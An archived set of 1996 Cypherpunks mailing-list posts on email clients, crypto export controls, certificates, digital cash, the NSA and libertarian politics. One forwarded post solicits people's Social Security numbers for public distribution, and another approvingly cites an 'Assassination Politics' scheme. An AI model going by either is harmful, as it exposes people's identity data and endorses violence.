expect in Exchange:

1. Return-Path overrides From:. This is a Major Bummer on, for 
example, majordomo lists, because by default all replies go to the 
list owner.

2. No .signature support. Combine with the above and you have a real 
problem.

3. Annoying WINMAIL.DAT ms-tnef attachment.

4. Annoying "if you don't have a standard MIME mail reader, you need 
to upgrade" prepended to every message. Suddenly Microsoft supports 
IETF standards.

5. The alternative to ms-tnef is quoted/printable, not text/plain. 
Not all MUAs handle the quoted/printable generated by Exchange 
properly. Microsoft Mail and Pine, for example.

- - -rich
 owner-win95netbugs@lists.stanford.edu
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I have no further comment at this time.

iQCVAwUBMPBlho3DXUbM57SdAQEOcgP8DSRKwW44fKpWWxDBZOBvb2hKfX8b6p85
NnhYgzjUlNC7wneOww2NcO+Lb+F9pPfBYWVgCeUN3kUWHbp4b/MMx+RmzQXxmwLL
lNghzWxBTY4JR3/088mOPNMnp8xfLArS75lvtM+13/fIBlibAoye5uq57r5h1tGT
DC/X6n2/TLQ=
=zgD4
- -----END PGP SIGNATURE-----


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPBlPSoZzwIn1bdtAQFk1wF+NhPXjVnj35ZgKdVq+aCOipXIDlly5hbe
zbiuXjrzd32XZuzIUgixnQnAKJTh8EJ/
=BnVe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 8 Jan 1996 09:03:44 +0800
To: cypherpunks@toad.com
Subject: (fwd) Private SSN Collection Project (fwd)
Message-ID: <Pine.SOL.3.91.960107194617.8914D-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I thought this was interesting.  -bd

---------- Forwarded message ----------
Date: Sun, 31 Dec 1995 00:01:48 -0800
From: Clint Danbury <danbury@shell.wco.com>

Thank you for your response.

Please send Full names and Social Security Numbers of anyone you know,
including government officers and/or employees, to: 

Clint Danbury, 
Box 750037, 
Petaluma, CA 94975-0037

email: danbury@ssnShirt.com


Questions And Answers On The Nationwide SSN Collection Project.


-1-	Why are you collecting SSNs ?

Answer: For fun and amusement.  


-2-	What do you plan to do with them ?

Answer: Put them on sweatshirts and sell them through specialty
clothing retailers.  It has been suggested also that I post them on
large billboards along the Mexican border, but I don't have enough
capital to pull of such a stunt at this time.


-3-     How long do you intend to continue this ?

Answer:   Until it becomes illegal.  The moment any legitimate
government authority informs me of the specific laws which (A) Forbid
the collection, recording, and distribution of SSNs by private parties,
and (B) Provide legal recourse for the individual citizen against
private parties which do so, I will stop.


-4-     What if the government finds out what you're doing ?

Answer:    First off, the government knows very well what I'm doing.
I've been "reported" multiple times to the SSA and the Secret Service.
Secondly, the government can find me quite easily (I'm in the phone
book).  Third, I will cooperate completely with any legitimate
government authority.


-5-     Here's my ex-spouse's SSN; will you make him/her miserable for
	me ?

Answer:   Hell No ! If you want me to engage in illegal activity for
you, then go somewhere else !


-6-     Isn't what you are doing illegal ?

Answer:   Not according to the SSA.  They have declared the private use
of the SSN unrestricted.  (More on this in a few questions)



-7-     If My name/SSN were in your database, would you tell me ?

Answer: In order for me to confirm this, you must first tell me what
your full name and SSN is, then I will tell you if you were already in
there.  If this sounds like two-faced hypocrisy, great!  I got the idea
from CBI-Equifax; that's their very own policy.  If you don't tell them
what your SSN is, they won't tell you what they've got on you.
Therefore, I have decided to do the exact same thing.  (If you don't
believe it, then why don't you call them and ask for yourself?)


-8-     What if someone did the same thing to you ? How would YOU feel
?

Answer:  This already has  happened to me.  I told the SSA office about
it, repeatedly, and they would take no action.  (The story appears in
the next answer.)


-9-     How did this all start ?

Answer:    In 1985, a co-worker learned that I object to the
"Uni-Number" concept of identifying a single person across multiple
databases.  I was (and still am) specifically concerned about the use
of the SSN for Non-Tax identification.  The company placed our SSNs on
our name tags, which, thankfully, we did not have to wear constantly,
although we would occasionally have to display it for a guard during
certain times.

This co-worker went poking through my briefcase while I was out of my
office, copied down my SSN, and then, for his own fun and amusement
(I'm guessing at his motives, I don't know his true reasons) displayed
it for me, and would not tell me where he got it.  Seeing that this
angered me, he then went to other co-workers, who joined him in making
my SSN even more public.  They then went to the personnel files, (which
the company made no attempt to keep locked) and double-checked the
number with my job application.  After that, they memorized it, and,
(again, I'm guessing here) for their own amusement, they would recite
it in unison around the lunch table.  (I know this sounds impossible,
but it really did happen.)

After that job ended (not very happily, surprise) I let myself cool off
for a few months, and then moved to another city.  During my time in
that other city, I contacted the SSA office there, seeking another
SSN.  I made dozens of phone calls and wrote letter after letter, all
to no avail.  My letters got shorter and to-the-point, not long drawn
out things.  It took only 30 seconds to read them.  This continued for
several months.

The result was always the same: words without action, and no
replacement SSN.

The company in that city went down the tube, and I had to move again.
I wrote and called off-and-on over the next few years, and got the same
treatment; empty words, stall-him-off, and they would make no statement
one way or the other.

In September of 1993 (perhaps an earlier date, I'm not sure) the SSA
finally came out and gave their official written approval for
unrestricted use of the SSN by private individuals and private
organizations for any purpose, including fun and amusement.  The
pamphlet is entitled "Your Social Security Number", is SSA Publication
05-10002, and dated September/1993.  You can get a copy by calling them
at 1-800-772-1213.

On page 9 of that pamphlet, they have finally removed all restrictions
on the private use of the SSN and they've put it in writing...

"Because there is no law concerning the use  of a person's Social
Security number by a  private individual or organization, Social
Security has no control over such use."

So, if those are the rules they've made, fine.  Those are the rules by
which I'll act.  The collection and distribution of other people's SSNs
is (as you've just read) a legally unrestricted activity and that's
exactly what I'm doing.


-10-    Where do you get the SSNs ?

Answer: "...there is no law..." so, just like CBI, TRW, TU, et.al., I
don't have to tell you where I got yours.  Ask CBI where they got your
SSN; they won't tell you, and neither will I.


-11-    How do you check for accuracy ?

This question bothered me a lot at first, however, it has become
astoundingly simple to check whether a number is accurate or not.  So,
just exactly how do I do this ?   CBI doesn't have to tell, and neither
do I.  "...there is no law..."


-12-    How can I get a copy of your list ?

Answer: Unfortunately, I have found the drones to outnumber the
worker-bees by a factor of about 10-to-1.  This is not the
soup-kitchen, it's a group project.  If you want SSNs from me, then I
want SSNs from you.  In the past, I offered a 1-for-1 exchange.  I will
no longer make that public offer.  What is offered is this: If you will
send me full names and SSNs of prominently elected officials,
media-babes, et.al., then I will (to the extent my database allows)
send you back full names and SSNs of other prominent politicians and
media babes, 1-for-1 if I can.  Of course, full names and SSNs of any
individual or group are still welcome, they just don't qualify for the
1-for-1 offer.

				Copyright, 1995 by Clint Danbury












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 8 Jan 1996 09:12:41 +0800
To: llurch@networking.stanford.edu
Subject: NOM_ail  Re: Microsoft has a way to go on E-Mail
Message-ID: <199601080056.TAA09551@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by llurch@networking.stanford.edu (Rich 
Graves) on Sun, 7 Jan  7:28 PM

>I'm sure they're scared. What press?


   NYTimes has a piece today on buggy and clogged e-mail and
   mentions MSN as an example, along with overloaded IPs,
   badly designed security wraps and other clunkers. "Right
   now, building market share is the name of the game. Service
   will get worse for a while, reputations for quality will
   start to be formed, at which points firms will compete on
   quality, which will start to improve," says a brain.

   NOM_ail












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: migueldiaz@gnn.com (miguel diaz)
Date: Mon, 8 Jan 1996 09:51:52 +0800
To: cypherpunks@toad.com
Subject: Re: phone calls from hell
Message-ID: <199601080136.UAA31233@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>I suppose this phone was prepared especially for Ayyash, but the 
>imagination wanders.  Imagine a world in which *every* cellphone 
>(or other net-connected computer or ....) had a little explosive built 
>in.  For that matter, the case itself could be constructed of a plastic 
>explosive.  

Certainly gives a whole new meaning to the slogan "Reach out and touch 
someone".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Jan 1996 13:36:17 +0800
To: dnowch2@teleport.com
Subject: Re: Hammill 1987 speech
Message-ID: <m0tZ9iS-000906C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a response to feedback on my original post that was originally posted to Cypherpunks@toad.com, newlibertarians@teleport.com, and dnowch2@teleport.com.  The respondor ("Vladimir Z. Nuri",  widely suspected of being an L. Detweiler 'tentacle,') put his response into Cypherpunks alone. 

At 12:43 PM 1/4/96 -0800, you   <vznuri@netcom.com>      wrote:
>
>the Hammill 1987 speech is interesting and prescient but also contains
>some of the subtle mind-biases and prejudices of rabid libertarians
>that are easy for outsiders to spot.

Gee, YOUR biases seem AT LEAST as easy to spot too, huh?!?

> some day I might write a more
>ambitious essay on this, but for now I'll list a few items and suggest some
>counterclaims that will fry any libertarians brain.

Don't flatter yourself.

> all these ideas
>have analogues to cryptography which I'll elucidate as best I can.
>
>1. weaponry is good in the hands of individuals, tyrannical in the hands
>of the state.
>
>the analogy is with the crossbow and other weapons. as a logical
>consequence of these ideas, it seems libertarians
>think that utopia could be achieved if everyone could build their own
>backyard nukes. they are obsessed with the idea of "deterrence" which
>is a fancy word for MAD feer, mutual assured destruction fear.

Not, at least, for me.  The "backyard nukes" analogy is the one typically grabbed by the anti-gunners when they're trying to justify limiting the 2nd amendment.  One problem that I see with this "reasoning" is that they never analogize by trying to limit the power of THE STATE to own weapons, despite the fact that maximum-bang weaponry increased by over a factor of 1,000,000 between about 1935 and 1955 or so.  And not to mention that military weaponry deadliness increased by probably a factor of at least 100 between 1790 and 1935.  
Since (I assume you understand the argument, here) the US Constitution is supposed to be the complete statement of the legal powers of the Federal government, what's missing is a justification for even ALLOWING the government to engage in the kinds of weapons developments that it did post 1935 on constitutional/legal grounds.  The significance of this argument is this:  If you argue that "things have changed" and indiiduals should not be able to make/own nukes, that opens the door to similar claims that "things have changed" and the US Government should not be allowed to maintain the current military that it does.

Don't just come back and say the Constitution provides for open-ended "defense":  Nobody today would argue that the writers of the Constitution could have anticipated the development of the H-bomb or the F-15 or AWACS, but I see nobody using that argument to de-empower the government, while I FREQUENTLY see people trying to justify  restrictions on guns based on the kinds of developments in guns that have happened since the muzzle-loader was king.

>the analogy to cryptography is: cryptography is good in the hands 
>of individuals, tyrannical in the hands of the state.

Sometimes, it is indeed.  Especially since "the state" SHOULD serve at the pleasure of the individuals, not hte other way around.  You may disagree...

>again the idea is that the stronger the cryptography available to the
>individual, the better. however I don't want to get into any of the 
>guns == crypto arguments..
>
>2. the world is screwed up because governments have made it that way.
>
>this is such a silly premise 

It's also your "straw-man argument."

>but vast masses have subscribed to it 
>since the beginning of time. it's easy to say that any problem you have
>with your finances or your pet poodle is the fault of the Government,
>Big Business, or whatever.

While it's true that "the world is screwed  up" and it's also true that "governments have made it screwed up," libertarians don't usually (?) try to claim that governments bear _full_ responsibility.  Just most of it.

> libertarians are especially clever in 
>constantly inventing new terms, synonymous with "enemy" but not quite
>so coarse and vulgar ("statist" is the current favorite epithet), 

Actually, the term "statist" is a particularly useful and interesting term.  Against the backdrop of people stuck in their traditional left/right, liberal/conservative, Democrat/Republican ruts, libertarians remindthe world that politics can be viewed even better in two dimensions, for example the "Nolan Chart," otherwise known as "the world's smallest political quiz."  The thing I've always found fascinating about that representation is that it contains, embedded within it, the left/right spectrum, but perpendical to this is the libertarian/authoritarian (statist) axis.  In other words, it showed that some people seem to be just naturally control-freaks, whether they come from the left or the right.

Now,  language is IMPORTANT.  If you can control the language, you can control the debate.  Historically, there was no easy way to describe people now well-described by the term "statist", because they could be either of the "liberal" or "conservative" bent, the "Republican" or "Democratic" bent, etc.

>to name their endless list of bogeymen who prevent them from 
>supposedly achieving their full potential in life.
>
>why is it that libertarians have not created their own state long ago,
>but continue to stay in countries that they claim oppress them? I have
>never heard a satisfactory response to this. 

[note:  already in the Cypherpunks area he has been given a number of reasons for this; primarily based on attack by non-libertarian states]  These examples are presumably true;  governments fear competition that may later eliminate them.  Companies do too, but they're generally limited in their ability to fight back.

> the real answer of course
>is that the rabid libertarians will never find a system they like,

A misleading statement.  They may never "like" any system forced on them, and by saying they "find" it implies that it is made by (and, presumably, ENFORCED BY) somebody else!

> they
>will criticize anything that exists, and never work to find a better
>alternative through constructive, positive means, but are happy to try
>to sabotage whatever has been built by others in the name of some
>noble and holy guerrilla war.

What's wrong with sabotaging the work of flaming statists?!?

>the analogy to crypto: any technology such as crypto that helps people avoid 
>governments, and hide their dealings, promotes utopia. governments
>are the root of all evil, and anything that destroys them destroys 
>evil.

Sounds logical to me...


>3. the government vs. the people dichotomy
>
>endlessly, even in a system that is expressly designed to present this
>polarization,

Maybe you meant, "prevent."  But even expressed this way, that was wrong.

> libertarians subscribe to the idea of "us vs. them" in
>every avenue of reality.

So what else is new for nearly all political philosophy?  If anything, I've heard more "us vs. them" from NON-libertarians than from libertarians.

> this thinking is entirely the same as that
>held by the NSA and cold war defense contractors. what's the difference?

Maybe this portion of the philosophy ISN'T the difference, and something else IS...

>none.  we have a system in which the designers said it was "of, by, and
>for the people", but a libertarian cannot handle this unity, 

The variability is the entent to which "this system" controls society.  Even if we assume that "a government" is necessary, there is still an enormous variability as to HOW MUCH that government controls. 200 years of change has produced an enormous differnece.  There is NO REASON TO BELIEVE that libertarians should have to "handle" the 1996 version of reality that was only originally intended in 1790 to control a tiny fraction of one's life.  Your argument seems to be a paean to an open-ended approval of government.

>nor can
>apparently any other citizen in the US that criticizes their government
>as if it is something apart from themselves.

The answer to that is simple.  "Their ('our') government" is INDEED "something apart from themselves"!  For just one example, those military contractors pay their bribes to POLITICIANS, not randomly selected citizens, for a GOOD REASON. Governments of all kinds are INDEED, "apart" from their citizenry!!! 


>cryptography helps people preserve these illusions of separation.
>there are people who are "in" and "out" and those "out" cannot read
>your messages. what prevents leaks from "in" to "out"? libertarians
>would like to have you believe they have solved this problem with 
>technology. but it is not a technological problem. it is an issue
>of trust, something that cannot be formalized or preserved by any
>invention. but don't tell this to a libertarian, who has dedicated
>his entire ideology to attempting to prove that one can actually
>achieve human integrity & utopia through technology alone and
>insisting that anything else is wholly superfluous.

Detweiler is beginning to lose touch with reality with this previous sentence.

>
>4. egalitarianism: libertarians are always saying that we don't
>have it and ranting about this injustice. 

Odd that you would claim this.  If anything, the libertarians I've met are about as "anti-egalitarian" as they come, as long as you're talking about GOVERNMENT ENFORCED ACCESS TO WEALTH AND POWER.  


>but in their arguments, such as Hammill's, you will always find subtle 
>arguments that they don't really want egalitarianism: some individuals should
>have an "edge" with their technology over those who seek to oppress them.

Subtle?  SUBTLE????  I have, in fact, heard more RABIDLY ANTI-EGALITARIAN (again:  Where egalitarianism is defined as government-enforced equal-treatment by private individuals of private individuals.) arguments by libertarians, who object (for just one example) to the ADA (Americans with a Disability Act) because it requires private organizations (corporations, for instance) to build buildings to be "accessible" to everyone.  If anything, libertarians are the most PROUDLY anti-egalitarian people around, in that they don't want the heavy hand of government to try to equalize society by the barrel of the gun.

In other words, Detweiler...er...Nuri  has totally dissociated himself from reality.  He clearly doesn't understand the first thing about libertarianism.

>they would be all for it if individuals had the capability to create
>atom bombs but somehow governments did not. the philosophy is inherently
>desiring inequality at its root.  the implication with crypto is that
>governments should have to reveal everything but individuals can have 
>total secrecy.

Actually, since "governments" are merely the agents and employees of the citizenry (or they should be!!!) this is a valid argument.  Since the government is the "employee" and the citizenry pays it, the citizenry gets to call the shots.


>beware of someone who tells you that utopia cannot currently be realized
>because
>
>1. governments ("they") do not allow it for "us".
>2. there are a lot of people preventing it from being realized, and we
>have to *get*rid* of them first.
>3. the correct technology does not yet exist. once it is invented, however,
>all problems will be solved.

Actually, my "Assassination Politics" idea stands an excellent chance of achieving exactly these breakthroughs.  You don't like it, however.


>I'm not actually going to rebut any of these outright other than to
>the degree I have,

In other words, you can't think of any better arguments...

> and point out that history is ample evidence they are all false.

Which history?  What history?  Whose version of history?

>  of course I don't expect any of the libertarians to understand
>my points, but frankly I think I am going to enjoy watching obtuse and
>angry flames for pushing the hot buttons.

In other words, you've given up now.  Thank you for your flames.  They'll probably convince something new that I'm right...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dang@netcom.com (DRG)
Date: Mon, 8 Jan 1996 13:58:56 +0800
To: cypherpunks@toad.com
Subject: Encryption sales ban costs U.S. $60 billion
Message-ID: <199601080540.VAA20262@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Nothing like boiling things down to the bottom dollar to make the media
pay attention. The following brief ran in the business section of the 
S.F. Examiner:

ENCRYPTION SALES BAN COSTS U.S. $60 BILLION

NEW YORK U.S. companies will lose as much as 30 percent of the $200 
billion in U.S. computer system sales expected in 200 because of federal 
export laws that limit the encryption of information, a recent study found.

The study was sponsored by 13 large U.S. technology companies.  The 
group, known as the Computer Systems Policy Project, includes 
International Business Machines Corp., the workd's larges computer maker, 
and AT&T corp., the nation's biggest phone company.

"It's the first time anyone has set out to show the real economic impact 
export laws have," said Jeff Rulifson, director of technology development 
as Sun Microsystems Inc., one of the study's sponsors.

The government prevents U.S. companies from exporting hard-to-break 
computer codes that turn information, such as files and credit card 
numbers, into indecipherable material that can be sent across computer 
networks without fear of tampering.


-- quoted without permission.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 8 Jan 1996 14:06:19 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <01BADC99.C7034FE0@dialup-169.dublin.iol.ie>
Message-ID: <30F0AEA5.64DD@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Futplex wrote:

> Frank O'Dwyer writes:

> > Plus, given secure identity (which might be an anonymous id), you can
> > layer the other stuff on top.
> 
> I am swayed by the view expounded by Carl Ellison that a key, not an
> identity, should be the anchor to which attributes are attached. (Sorry if
> I am misstating or oversimplifying the position here.) I think identity
> should be hung off the key as just another (optional) attribute.

  This is exactly how I view X509 Version 3 certificates.  You can attach
any sort of attribute to the key, including a name/identity.  Though the
spec gives the name preferential treatment for historical reasons, I
view it as just another optional attribute.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 8 Jan 1996 14:21:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Hammill 1987 speech
In-Reply-To: <m0tZ9iS-000906C@pacifier.com>
Message-ID: <199601080601.WAA09591@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Bell: 

if I were to summarize my arguments, they would be that governments
are the way that they are not so much because they attract certain
dysfunctional individuals, but rather because they are microcosms
and macrocosms of human psychology. the problems with government
that libertarians rant about are problems with human behavior.
the solution is not to get rid of governments-- this is confusing
cause and effect, symptom and cause. the solution is to work on
human behavior. when humans begin to think in a different,
positive way, their governing systems will automatically reflect the change.

my essay was designed to show the negative aspects of governments
that rabid libertarians are always endlessly ranting about are actually
embodied in the psychologies of those libertarians themselves. therefore,
while I agree with the libertarian that there are many problems with
governments, I see no reason to believe that libertarians are proposing
a workable alternative, based on their own stark biases and prejudices. 
in fact it seems quite obvious to me that their own "alternatives" are
either "vaporware" or would be far worse in practice than even the
dysfunctional systems we have in place today.

rabid libertarianism reminds me of Marxism: sounds great in theory, and
you might even convince large parts of the population or key people in
power to follow it. but does it truly present an implementable and workable
alternative? where are the specifics?

identifying problems with government is quite trivial. this is destructive
criticism, analogous to the guerilla warfare of words that rabid libertarians
love. but criticism is easy compared to construction of something that works.

when you focus your attempts on creating a system that embodies your
ideals instead of ranting at those that do not (and complaining that
you cannot because governments prevent you), you will make far more
progress in developing your ideas and convincing the world to follow you
than any number of essays can accomplish.

if libertarianism is truly workable, shouldn't it be workable on
small scales? what prevents individuals from actually starting it going
at a small scale and growing it? that is the path that every government
and nation has taken since the beginning of time, why do you think you
should be exmempt?

I don't see that any of your response to my essay detract from this
basic message so I'm going to pass on a detailed reply.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 8 Jan 1996 11:29:00 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: please stop the Mitnick stuff
In-Reply-To: <v02120d0bad14ee9ba9ef@[192.0.2.1]>
Message-ID: <4cq1u3$84m@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d0bad14ee9ba9ef@[192.0.2.1]>,
Lucky Green <shamrock@netcom.com> wrote:
>At 21:16 1/6/96, John Young wrote:
>
>>   Also, crypto-related: The fact that Shimomura's supposedly
>>   secret files were not protected by encryption or other
>>   security is what causes Littman and others to think there
>>   was a sting (perhaps with TLA help) rather than foolish
>>   vanity of the security wizard.
>
>[I do belive this has CP relevance.]
>
>Of course it was a set-up. Mitnick got into Shimomura's computer by
>impersonating the IP address of one of Shimomura's machines. The router
>should have never let packets in from outside that have an IP address that
>is supposed to be inside. That a 'security expert' would overlook such a
>blatant and well publicized hole in his _own_ router is inconceivable.

"That word you keep using -- I do not think it means what you think it means."

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 8 Jan 1996 14:38:13 +0800
To: <cypherpunks@toad.com>
Subject: RE: "trust management" vs. "certified identity"
Message-ID: <v02120d14ad16610af24f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:40 1/7/96, Frank O'Dwyer wrote:

>But it is usually easier to
>determine (and vouch for) who a stranger is than how trustworthy
>they are, if only because there are quick and easy real-world
>mechanisms for this (driver's licence, passport,etc.).   That's all
>I meant.

Though it may seem that way, I am not so sure that it is true. I am told
that you can buy a CA driver licence in the hispanic part of San Francisco
for about $50. Hologram and all. Reputations can take years to establish. I
am would feel more comfortable to sign certain statements about the
(on-line) character or technical skills of some people on this list whom I
have never met, than to sign the PGP key of an utter stranger that shows me
his Alabama ID card.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 9 Jan 1996 13:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: "Microsoft.com" added to my KILL file
Message-ID: <v02120d16ad1667f19160@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 1/7/96, Timothy C. May wrote:

>This is a battle I've been fighting for roughly the past year. When I get a
>blank message from someone saying only "attachment converted," I add that
>username to my kill file. My feeling is that a mailing list with 1000+
>subscribers, or even one with far fewer, is a terrible place to send
>non-ASCII messages. Readers will be using VT-100s on campus networks, old
>Amiga 1000s, EMACs, Suns, Macs, IBM PCs, Windows, and all sorts of
>configurations to read mail, and there is almost no chance that all or even
>most of these will be brought up to the latest MIME standards. Plain ASCII,
>such as 98% of this list has been for the past several years, is the lingua
>franca, the lowest common denominator (see, some number theory relevance
>for you purists!) of the Net. There has been little compelling need for
>embedded spreadsheets and embedded graphics. And as for attachments, such
>as attaching programs for running on a machine, mailing list messages are a
>very poor way to distribute such programs, for many reasons.

I agree 100% with this paragraph. [Some old story, if you don't know it,
don't worry :-]


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 8 Jan 1996 23:40:33 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: NSA says strong crypto to China?
In-Reply-To: <199601080625.WAA21243@blob.best.net>
Message-ID: <Pine.ULT.3.91.960107223929.16243D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jan 1996, James A. Donald wrote:

> At 03:23 PM 1/7/96 -0600, Alex Strasheim wrote:
> > But I don't necessarily look at the
> > NSA as an enemy.  Right now we're on opposite sides of an important issue,
> > and I think they're doing a lot of damage.  But I tend to think that they
> > believe what they're doing is in the national interest.  They're trying 
> > to defend democracy -- our democracy, at least.
> 
> I see no sign that NSA is capable of distinguishing between the 
> interest of the state and the interest of the nation.

Agreed. They're a bureaucracy and a statist entity. But states are 
distinct and antagonistic entities. There's no world government.

As someone who worked with Terry Karl in El Salvador, I also think your
Central American history is a bit off, but that's off topic, and normal
for the US. Agreed that Chomsky is usually rather weak on the facts, which
is why he is seldom cited in academic journals; he's really just a darling
of the press, because the man exudes eggheadedness and erudite sarcasm. He
never should have strayed from developmental linguistics. 

> Two government officials, one of whom is a communist, have 
> more in common than two communists, one of whom is a government 
> official.  The NSA is on the same side as the Chinese government,
> and if Chinese dissidents used crypto with US GAK, this information
> would be exchanged with the Chinese government.

I don't see this happening.

The NSA is logically allied with other organizations of greater
repressiveness, inasmuch as it is not really in the interest of the NSA to
pursue absolute freedom anywhere. Certainly they have no desire for anyone
in the world to enjoy privacy. However, this logical symmetry does not
translate to practical collaboration. You think the NSA and the Chinese
government trust each other at all? They're spying on each other.

One certainly observes strange bedfellow situations among three letter
agencies (the Iran/Contra affair; Cuban and South African aiding of
insurgents of every political stripe; US intelligence information on Iran
provided to Iraq); but one also observes strange conflicts (the Pollard
affair, Israel's spying on the US; back to Dreyfuss; intrigue within the
EC). 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 8 Jan 1996 15:50:13 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$ payee anonymity (Was: e$: Come aaaannnndddd Get it!)
Message-ID: <199601080435.XAA20775@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Still working through my 10MB cpunks mail backlog; this one's from 
November 17, 1995:

jim bell writes [msg #0]:
> It seems to me that this should be possible, within limits, if the potential
> payee could generate a "blinded" note to be delivered to the payer by
> anonymous means.  The payer could get the note certified by the bank,
> possibly given an extra "blind" if necessary  (is this possible? Desirable?
> Why not?) and then the resulting still-blinded but certified note is posted
> (in encrypted form, I supposed) to the 'net so that only the payee can
> decrypt and unblind it.

I wrote:
# This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
# dollar bill first." As I understand your protocol, Bob gives Alice an enote,
# then Alice gives Bob an enote. 
[...]

jim bell writes [msg #1]:
> It sounds like you understand even less about the details of digital cash
> than I do.
> 
> First, read the August 1992 issue of Scientific American, the article by
> David Chaum.  He explains, with a certain amount of detail, how blinded
> digital cash operates.  To become validated and worth money, it first has to
> be electronically "written," blinded, and then signed by the bank.  Then it
> is unblinded, at which point it can be spent.  
> 
> What I was saying is that the notes would be written by the payee, then
> blinded by the payee, given to the payer, and then signed by the payer's
> bank.  At this point, they are worth money, and they are then returned to
> the payee, 
[...]

Aha, thanks for the elaboration. I was confused by your use of the term
"note" to describe something that isn't in fact worth money, when you said
"the potential payee could generate a "blinded" note to be delivered to the
payer". It also helps that I haven't read much of the ecash(tm :) protocol 
details :}

Futplex <futplex@pseudonym.com>		"KC who?"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPCeyynaAKQPVHDZAQFDygf/bUtOQcyhz9p1a3SdmwW8z0+sLtIhTgpM
Ii3mmFiFPaKmUYwdQiRbUi8KVCIooZCWhY44NRDlcRUZJSYCy0E0vBoJmwIKEq7g
NMN5wvmoRhEnoezYMaI2bVW782cTN9RZy4MH2oRc8OARTrm1yGrLh31WN7iX9Uh3
hv6nDVPjVfSg7T1O5P4upN8UWEiLaEvCvzeKvdLZoIrNpWaMNsdUOgV9+IOv7ns7
NVYtfb3ZgURr3/kxpvRAMorW76+qpaDF9CH6us9bI4ZTsUMhoH4JfSTeNQ3XaSnC
QAZxpjfM3EVd79jF+djnliq+29bDnzMuOhpAefIBs6PQMq05gQfE0A==
=1aX0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 8 Jan 1996 16:09:57 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: NSA says strong crypto to China?
In-Reply-To: <199601071553.KAA18768@pipe3.nyc.pipeline.com>
Message-ID: <30F0CE52.6E04@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> That's what this list is all about:  we're trying to impose certain civil
> liberties on the world using a strategy that's based on anarchy theory.
> That theory tells us that if we can distribute tools and establish
> standards we'll secure privacy and free speech rights regardless of what
> governments do.  That's a very startling idea, and I believe it's sound.
> I believe that it's possible to impose the first ammendment on the entire
> world by distributing crypto software.
>
> So the question we ought to be putting to the NSA is this:  isn't it in
> the best interest of the United States and the other capitalist Western
> democracies to impose the first ammendment on the rest of the world?
> 
> I don't see how anyone could argue that it isn't.

  I think that you are putting too much faith in both the western
governments and the citizens of those countries.  If you read the article
that I originally quoted, you will find that the author (in the UK) feels
that the first ammendment gives us in the US too much freedom of speech.
I think that many (perhaps most) feel the same way.  They are willing to
give up their liberty for some dubious protections as Ben Franklin spins
in his grave.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
